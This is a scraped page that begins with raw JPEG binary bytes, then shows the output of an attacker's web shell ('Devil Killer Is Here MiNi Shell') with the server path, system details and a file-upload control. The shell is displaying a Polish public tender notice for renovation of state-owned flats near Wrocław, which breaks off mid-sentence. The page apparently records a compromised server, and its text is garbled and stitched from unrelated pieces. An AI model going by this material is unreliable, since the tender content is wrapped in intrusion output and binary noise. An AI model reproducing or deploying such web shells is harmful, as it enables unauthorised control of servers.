JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220705/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220705/0023948501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Roboty remontowe w lokalach mieszkalnych stanowiących Zasób Własności Rolnej Skarbu Państwa będących we władaniu KOWR OT we Wrocławiu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Krajowy Ośrodek Wsparcia Rolnictwa</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Oddział Terenowy we Wrocławiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 367849538</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Mińska 60</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">54-610</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne.wroclaw@kowr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.kowr.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - agencja wykonawcza</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarowanie nieruchomościami Skarbu Państwa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Roboty remontowe w lokalach mieszkalnych stanowiących Zasób Własności Rolnej Skarbu Państwa będących we władaniu KOWR OT we Wrocławiu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-abdc9d70-f91e-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00239485</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00045456/13/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.8 Jagodnik 27/7, gmina Świdnica - remont lokalu z wydzieleniem łazienki</p> <p class="mb-0">1.1.10 Wałbrzych dz. ul. Wilcza 34/ 2/3/5/6 57 Lubiech 52 -wydzielenie i urządzenia łazienek w lokalach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://kowr.eb2b.com.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem platformy zakupowej pod adresem https://kowr.eb2b.com.pl/ . Szczegółowe informacje znajdują się w Rozdziale VIII SWZ</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Szczegółowe informacje znajdują się w Rozdziale XII SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z rozdziałem XXII SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z rozdziałem XXII SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WRO.WOP.260.30.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 306611,90 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot 1; Jagodnik 27, gmina Świdnica, remont i przebudowa lokalu mieszkalnego nr 7 w budynku mieszkalnym wielorodzinnym,<br/><br/>Zakres robót obejmuje:<br/>Roboty rozbiórkowe i demontażowe w części wspólnej budynku:<br/>- demontaż części pokrycia dachowego z papy i deskowania pełnego pod przejście nowoprojektowanego komina<br/>- demontaż desek podłogowych poddasza, usytuowanego nad lokalem mieszkalnym Nr 7<br/>- demontaż zdegradowanych belek stropowych, usytuowanych nad lokalem mieszkalnym Nr 7 i pod lokalem mieszkalnym nr 7<br/>- rozbiórka części ściany oddzielającej lokal mieszkalny nr 7 od klatki schodowej w celu powiększenia drzwi wejściowych do lokalu mieszkalnego nr 7 (po wykonaniu projektowanego nadproża)<br/>- rozbiórka nadproży okiennych i części ściany zewnętrznej w celu powiększenia otworów okiennych (po wykonaniu projektowanych nadproży)<br/>- demontaż stolarki okiennej i drzwi wejściowych do lokalu mieszkalnego nr 7<br/>- wykonanie otworów wentylacyjnych w ścianie konstrukcyjnej w lokalu mieszkalnym nr 7<br/>- demontaż fragmentu instalacji kanalizacyjnej na klatce schodowej I i II piętra w celu wykonania podłączenia instalacji kanalizacyjnej z lokalu mieszkalnego nr 7<br/>- demontaż fragmentu instalacji wodnej w kondygnacji parteru w celu wykonania podłączenia instalacji wody do lokalu mieszkalnego nr 7<br/>- demontaż istniejącej instalacji elektrycznej wlz prowadzonej od złącza głównego do tablic licznikowych wszystkich lokali mieszkalnych<br/>- wykonanie bruzd w ścianach i przebić w stropach pod prowadzenie instalacji wodnokanalizacyjnej i elektrycznej<br/>- skucie tynku w pasie o szerokości 30 cm na elewacji północno-wschodniej ( ponad dachem budynku niższego Jagodnik 27A)<br/><br/>Roboty rozbiórkowe i demontażowe w lokalu Nr 7:<br/>- demontaż istniejących instalacji i urządzeń elektrycznych<br/>- rozbiórka pieca kaflowego i trzonu kuchennego<br/>- demontaż stolarki drzwiowej wewnętrznej<br/>- rozbiórka ściany wewnętrznej działowej w miejscu usytuowania projektowanego przejścia z kuchni do pokoju<br/>- usunięcie istniejących desek podłogowych w lokalu mieszkalnym nr 7 wraz z wykładziną z linoleum usytuowaną w pomieszczeniu kuchni<br/>- usunięcie zasypki stropu drewnianego usytuowanego pod lokalem mieszkalnym nr 7<br/>- usunięcie odspojonych, zagrzybionych ( w pokoju) i pomalowanych farbą olejną (lamperia w kuchni) tynków wewnętrznych i łuszczących się powłok malarskich<br/>- demontaż podsufitki, desek ślepego pułapu i zasypki stropu drewnianego usytuowanego nad lokalem Nr 7<br/>- wycięcie bruzd w ścianach pod instalacje wody, kanalizacji, c.o. i instalację elektryczną<br/><br/>Roboty budowlane w pomieszczeniach lokalu Nr 7<br/>- wymiana zdegradowanych drewnianych belek stropowych usytuowanych w stropie pod lokalem mieszkalnym Nr 7<br/>- wymiana zdegradowanych drewnianych belek stropowych usytuowanych nad lokalem mieszkalnym Nr 7<br/>- wykonanie zabezpieczenia owado i grzybobójczego oraz p.poż. pozostawianych i wymienionych belek drewnianych stropu pod i nad lokalem mieszkalnym Nr 7<br/>- montaż pomiędzy belkami stropowymi stropu pod i nad lokalem mieszkalnym Nr 7 izolacji termicznej z wełny mineralnej, zabezpieczonej paroizolacją z folii PE<br/>- wykonanie nadproża z belek stalowych nad powiększanym otworem drzwi wejściowych do lokalu mieszkalnego nr 7<br/>- wykonanie izolacji termicznej ściany wydzielającej lokal mieszkalny nr 7 od klatki schodowej<br/>- wykonanie nowych parapetów wewnętrznych<br/>- zamurowanie otworu drzwiowego w ścianie działowej<br/>- montaż w pomieszczeniu łazienki ścianek lekkich z ognioochronnych, odpornych na wilgoć płyt gipsowo-kartonowych, z wypełnieniem wełną mineralną, zabezpieczoną folią paroizolacyjną<br/>- wykonanie w lokalu mieszkalnym Nr 7 systemowych sufitów podwieszanych o odporności pożarowej REI30 z ognioochronnych płyt gipsowo-kartonowych, montowanych na systemowych stelażach<br/>- odgrzybienie ścian w lokalu mieszkalnym nr 7<br/>- remont i uzupełnienie istniejących tynków w lokalu mieszkalnym nr 7<br/>- montaż w lokalu mieszkalnym Nr 7 niepalnych płyt OSB (B s1,d0)<br/>- ułożenie w pokoju paneli podłogowych na podkładach, zabezpieczonych folią PCV<br/>- wykonanie powłokowej izolacji przeciwwilgociowej posadzki w łazience i w kuchni<br/>- wykonanie okładzin z płytek ceramicznych lub gresowych podłogi w łazience i w kuchni<br/>- wykonanie okładzin z płytek ceramicznych ścian łazienki i pasa pomiędzy urządzeniami w kuchni<br/>- malowanie ścian i sufitów wszystkich pomieszczeń<br/>- zabudowa nowej stolarki drzwi wewnętrznych i wejściowych do lokalu mieszkalnego Nr 7<br/><br/>Roboty budowlane na poddaszu nieużytkowym:<br/>- wykonanie nowoprojektowanego komina murowanego ocieplonego wełną mineralną hydrofobizowaną, otynkowanego cienkowarstwowym tynkiem mineralnym<br/>- montaż niepalnych płyt OSB (klasa B-s1, d0) nad lokalem mieszkalnym Nr 7<br/><br/>Roboty budowlane na dachu i ponad dachem:<br/>- wykonanie nowoprojektowanego komina, z wykonaniem betonowej czapy kominowej<br/>- uzupełnienie pokrycia z papy i deskowania pełnego budynku Jagodnik 27 przy przejściu projektowanego komina<br/>- wymiana wywiewki kanalizacyjnej na wykonaną z blachy tytanowo-cynkowej<br/>- montaż obróbki blacharskiej przy kominie i przy przejściu wywiewki kanalizacyjnej<br/>- montaż kratek zabezpieczających wyloty wentylacji wywiewnej w nowoprojektowanym kominie wentylacyjnym<br/>Roboty elewacyjne:<br/>- wykonanie nadproży z belek stalowych nad powiększanymi otworami okiennymi<br/>- podmurowanie istniejących otworów okiennych<br/>- wykonanie nowych podokienników zewnętrznych<br/>- montaż nowej stolarki okiennej<br/>- roboty tynkarskie wokół okien<br/>- uzupełnienie tynku na narożniku północno i południowo-wschodnim w kondygnacji II piętra<br/>- wykonanie powłokowej izolacji przeciwwilgociowej w pasie o szerokości 30 cm na elewacji północno-wschodniej ( ponad dachem budynku niższego Jagodnik 27A)<br/>- wykonanie nowego tynku w pasie o szerokości 30 cm na elewacji północno-wschodniej oraz uzupełnienie brakującego tynku na elewacji północno-wschodniej ( ponad dachem budynku niższego Jagodnik 27A) w kondygnacji II piętra<br/>- uzupełnienie bruzdy pionowej na elewacji północno- zachodniej po prowadzeniu nowego kabla elektrycznego WLZ<br/>- planowany remont i przebudowa lokalu mieszkalnego Nr 7 powoduje także konieczność wykonania nowego wyposażenia techniczno – instalacyjnego oraz wewnętrznych instalacji w częściach wspólnych budynku<br/>- montaż zestawu wodomierzowego w szafce wodomierzowej przewidzianego dla lokalu Nr 7 w klatce schodowej II piętra<br/>- montaż trójnika na istniejącej rurze wodnej wraz z montażem rury wody zimnej, prowadzonej od parteru do kondygnacji II piętra w klatce schodowej w bruździe ściennej<br/>- przebudowa instalacji kanalizacji sanitarnej w klatce schodowej I piętra<br/>- przebudowa instalacji kanalizacji sanitarnej w klatce schodowej II piętra<br/>- wymiana linii zasilającej ( wlz ) od złącza kablowego, usytuowanego na elewacji północnozachodniej do projektowanej rozdzielni głównej RB, usytuowanej na parterze budynku,<br/>obok istniejących tablic licznikowych wszystkich lokali mieszkalnych (w klatce schodowej parteru jako instalacja podtynkowa)<br/>- wymiana linii zasilających z projektowanej rozdzielni głównej RB do istniejących tablic licznikowych wszystkich lokali mieszkalnych - instalacja podtynkowa<br/>- wymiana kabla zasilającego lokal mieszkalny nr 7, prowadzonego podtynkowo w klatce schodowej od tablicy licznikowej usytuowanej w kondygnacji parteru do lokalu mieszkalnego nr 7, usytuowanego w kondygnacji II piętra<br/>Wewnętrznych instalacji w lokalu nr 7:<br/>- budowa instalacji wody zimnej<br/>- budowa instalacji wody ciepłej z elektrycznego, pojemnościowego ogrzewacza wody<br/>- budowa instalacji kanalizacji sanitarnej<br/>- wykonanie instalacji centralnego ogrzewania<br/>- wykonanie nowej instalacji elektrycznej; oświetlenia i gniazd wtykowych oraz zasilania urządzeń elektrycznych<br/>- montaż osprzętu elektrycznego i urządzeń; elektrycznego kotła c.o., pojemnościowego ogrzewacza wody, kuchni elektrycznej z piekarnikiem, wentylatora łazienkowego<br/>- wykonanie instalacji teletechnicznej w lokalu mieszkalnym Nr 7<br/>- wykonanie instalacji dzwonkowej do lokalu mieszkalnego Nr 7<br/><br/>Szczegółowy zakres prac określony został w projekcie umowy, dokumentacji projektowej, przedmiarze robót, STWiOR,. Wymieniona dokumentacja stanowi załącznik do niniejszej specyfikacji warunków zamówienia i znajduje się na stronie internetowej Zamawiającego https://kowr.eb2b.com.pl/ w zakładce przedmiotowego postępowania </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 132537,83 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>1.Kryterium „Cena brutto za przedmiot zamówienia” (C) – waga 60 %, 2.Kryterium „Termin realizacji przedmiotu zamówienia” (T) –waga 16 %, 3.Kryterium„Gwrancja-Rękojmia” (G) – waga 24 % Sposób przyznania punktów opisano w z rozdziale XVIII SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">TERMIN REALIZACJI ZAMÓWIENIA</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">16,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">GWARANCJA-RĘKOJMIA</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">24,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot 2; Wałbrzych, ul. Wilcza 34, remont i przebudowa lokali mieszkalnych nr 2,3,5 i 6 w budynku mieszkalnym wielorodzinnym,<br/><br/>Przedmiotem zamówienia jest przebudowa i remont istniejących lokali w celu dostosowania do zamierzonych potrzeb i funkcjonalnych i standardów użytkowych. Układ ścian konstrukcyjnych i zewnętrznych nie ulega zmianie. Pomieszczenia higieniczno – sanitarne należy wydzielić lekką ścianą działową z pomieszczeń gospodarczych i mieszkalnych zachowując podstawowy układ funkcjonalny lokali. <br/><br/>Zakres robót lokal mieszkalny nr 2 <br/>-rozbiórka posadzki, rozbiórka okładziny ścian z płyt gipsowo – kartonowych w obszarze opracowania,<br/>-skucie tynków, wykonanie podkładu pod glazurę na ścianach w pomieszczeniu projektowanej łazienki <br/>-wykonanie posadzki z izolacją cieplną i przeciwwilgotnościową, <br/>-wykonanie ścianki działowej z płyt gipsowo – kartonowych wydzielającej pomieszczenie łazienki,<br/>-wbudowanie drzwi w ściance wydzielającej pomieszczenie łazienki, <br/>-montaż komina wentylacji grawitacyjnej, wywiewnej w pomieszczeniu kuchni i łazienki <br/>-montaż nawietrzaka podokiennego w pomieszczeniu kuchni,<br/>-wykonanie wewnętrznej instalacji wodnej oraz instalacji kanalizacji sanitarnej w lokalu, <br/>-wykonanie wewnętrznej instalacji elektrycznej w pomieszczeniu łazienki,<br/>-naprawa murów i uzupełnienie tynków,<br/>-montaż okładziny ceramicznej na ścianach i posadzce łazienki,<br/>-montaż armatury sanitarnej z osprzętem,<br/>-malowanie ścian i sufitu w pomieszczeniu łazienki <br/><br/><br/>Zakres robót lokal mieszkalny nr 3 <br/>-rozbiórka posadzki, rozbiórka nieczynnego czopucha komina, <br/>-powiększenie otworu drzwiowego w pomieszczeniu projektowanej łazienki,<br/>-skucie tynków, wykonanie podkładu pod glazurę na ścianach w pomieszczeniu projektowanej łazienki <br/>-wzmocnienie drewnianych belek stropowych, w pomieszczeniu projektowej łazienki,<br/>-wykonanie posadzki z izolacją cieplną i przeciwwilgotnościową, <br/>-wymiana drzwi w pomieszczeniu łazienki,<br/>-wykonanie ścianki działowej z płyt gipsowo – kartonowych wydzielającej pomieszczenie łazienki,<br/>-montaż komina wentylacji grawitacyjnej, wywiewnej w pomieszczeniu kuchni i łazienki <br/>-montaż nawietrzaka podokiennego w pomieszczeniu przedpokoju, <br/>-wykonanie wewnętrznej instalacji wodnej oraz instalacji kanalizacji sanitarnej w lokalu, <br/>-wykonanie wewnętrznej instalacji elektrycznej w pomieszczeniu łazienki,<br/>-naprawa murów i uzupełnienie tynków,<br/>-montaż okładziny ceramicznej na ścianach i posadzce łazienki,<br/>-montaż armatury sanitarnej z osprzętem,<br/>-malowanie ścian i sufitu w pomieszczeniu łazienki <br/><br/>Zakres robót lokal mieszkalny nr 5 <br/>-rozbiórka posadzki w pomieszczeniu gospodarczym,<br/>-demontaż muszli klozetowej w pomieszczeniu kuchni <br/>-skucie tynków, wykonanie podkładu pod glazurę na ścianach w pomieszczeniu projektowanej łazienki <br/>-wykonanie posadzki z izolacją cieplną i przeciwwilgotnościową, <br/>-wykonanie ścianki działowej z płyt gipsowo – kartonowych wydzielającej pomieszczenie łazienki,<br/>-montaż drzwi w pomieszczeniu łazienki,<br/>-montaż komina wentylacji grawitacyjnej, wywiewnej w pomieszczeniu kuchni i łazienki <br/>-wykonanie wewnętrznej instalacji wodnej oraz instalacji kanalizacji sanitarnej w lokalu, <br/>-wykonanie wewnętrznej instalacji elektrycznej w pomieszczeniu łazienki,<br/>-naprawa murów i uzupełnienie tynków,<br/>-montaż okładziny ceramicznej na ścianach i posadzce łazienki,<br/>-montaż armatury sanitarnej z osprzętem,<br/>-malowanie ścian i sufitu w pomieszczeniu łazienki <br/><br/>Zakres robót lokal mieszkalny nr 6 <br/>-demontaż wyposażenia, rozbiórka podłogi, wzmocnienie belek stropu w pomieszczeniu łazienki,<br/>-wykonanie posadzki z izolacją cieplną i przeciwwilgotnościową, <br/>-skucie tynków, wykonanie podkładu pod glazurę na ścianach w pomieszczeniu projektowanej łazienki <br/>-montaż komina wentylacji grawitacyjnej, wywiewnej w pomieszczeniu kuchni i łazienki <br/>-montaż nawietrzaka podokiennego w pomieszczeniu kuchni <br/>-wymiana wewnętrznej instalacji wodnej oraz instalacji kanalizacji sanitarnej w lokalu, <br/>-modernizacja wewnętrznej instalacji elektrycznej w pomieszczeniu łazienki,<br/>-naprawa murów i uzupełnienie tynków,<br/>-montaż okładziny ceramicznej na ścianach i posadzce łazienki,<br/>-montaż armatury sanitarnej z osprzętem,<br/>-malowanie ścian i sufitu w pomieszczeniu łazienki <br/><br/>Szczegółowy zakres prac określony został w projekcie umowy, dokumentacji projektowej, przedmiarze robót, STWiOR,. Wymieniona 